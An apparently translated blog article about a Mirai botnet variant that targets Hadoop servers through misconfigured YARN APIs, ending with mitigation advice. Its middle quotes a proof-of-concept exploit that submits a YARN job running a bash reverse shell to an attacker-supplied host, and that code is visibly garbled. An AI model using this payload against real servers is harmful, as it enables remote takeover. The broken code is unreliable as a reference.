In addition to IoT: Mirai botnet started attacking machines on Linux

    Mirai botnet appeared in 2016 and in a short time managed to infect more than 600 thousand IoT devices. Last week it became known about the new version of Mirai, the purpose of which is Linux servers with Hadoop. We understand what vulnerability the virus uses and how to “cover it up”.

    / Flickr / DJ Shin / CC BY-SA

    A couple of words about Mirai

    Mirai has become known for a series of high-profile attacks. One was on the blog of journalist Brian Krebs (Brian Krebs) after the publication of an article about the sales of botnet services. The other is on a large DNS provider Dyn , which caused a failure in the work of world services: Twitter, Reddit, PayPal, GitHub, and many others.

    To “capture” IoT devices, a botnet used a vulnerability associated with weak passwords (manufacturers made them the same for all smart devices). The malware monitored the Internet for open telnet ports and brute-in the known login-password pairs for accessing the device owner’s account. If successful, the gadget became part of the “malicious network”.

    At the end of 2016, the developers posted the source codes.virus in the network. This led to the emergence of several more versions of malicious software, but they all made the goal of the Internet of things their goal. Until recently, the Mirai worm has now emerged, which attacks Linux servers in data centers.

    Botnet "recruits" Linux

    The report on the new version of Mirai was published by information security specialists from NETSCOUT. It is known that a botnet attacks servers with the Apache Hadoop framework installed. As the information security specialists say, hackers are attracted by the power of iron. Hadoop is used on servers running high-performance computing and working with machine learning algorithms. A network of productive devices will allow you to make more destructive DDoS attacks.

    The Mirai version for Linux still hacks the system by selecting factory telnet credentials. But now the program does not need to distinguish between different types of IoT gadget architectures; Mirai only attacks servers with x86 processors.
    At the same time, the new botnet does not install malware on the hacked device on its own. The worm sends the attacker's IP-address of the vulnerable machine and a pair of login-password for it. Then hackers install DDoS bots manually.

    What vulnerability is used

    The malware uses the YARN module for server penetration, which is responsible for managing cluster resources and scheduling tasks in Apache Hadoop.

    If the YARN configuration is incorrect, an attacker can gain access to the system’s internal REST API through ports 8088 and 8090. When connecting remotely, an attacker can add a new application to the cluster. By the way, this problem has been known for several years already -  PoC-exploits have been published on  ExploitDB  and  GitHub .

    For example, the following exploit code is presented on GitHub :

    #!/usr/bin/env pythonimport requests
    target = ''
    lhost = ''# put your local host ip here, and listen at port 9999
    url = target + 'ws/v1/cluster/apps/new-application'
    resp =
    app_id = resp.json()['application-id']
    url = target + 'ws/v1/cluster/apps'
    data = {
        'application-id': app_id,
        'application-name': 'get-shell',
        'am-container-spec': {
            'commands': {
                'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        'application-type': 'YARN',
    }, json=data)

    In addition to Mirai, this vulnerability is used by another DDoS bot, DemonBot, which was discovered in October by Radware specialists. Since the beginning of autumn, they have recorded more than a million hacking attempts through the YARN vulnerability daily.

    What do experts say

    According to information security specialists, the most hacking attempts were made in the USA, the UK, Italy, and Germany. At the beginning of the month, just over a thousand servers worldwide were exposed to vulnerabilities in YARN. This is not so much, but they all have high computing power.

    There is also information that a vulnerability in Hadoop could provide attackers with access to data stored on unprotected servers. So far, no such cases have been registered, but experts warn that this is only a matter of time.

    The new version of Mirai does not spread quickly - only a few tens of thousands of attempts to hack Hadoop machines through YARN occur every day. And all the attacks come from a small number of IP addresses - no more than forty.

    / Flickr / jelene morris/ CC BY

    Such behavior of intruders and prompted NETSCOUT experts to the idea that the virus does not spread automatically - hackers manually scan the Internet and implement the program on unprotected machines. This means that owners of servers with Hadoop installed have more time to close the vulnerability.

    To protect against attacks, you need to change the network security settings . It is enough for administrators to restrict access to the computing cluster — configure IP filters or completely close the network from external users and applications.

    To prevent unauthorized access to the system, security experts also advise upgrading Hadoop to version 2.x and enabling authentication via the Kerberos protocol.

    Several posts from the VAS Experts blog:

    A couple of fresh materials from our blog on Habré:

    Also popular now: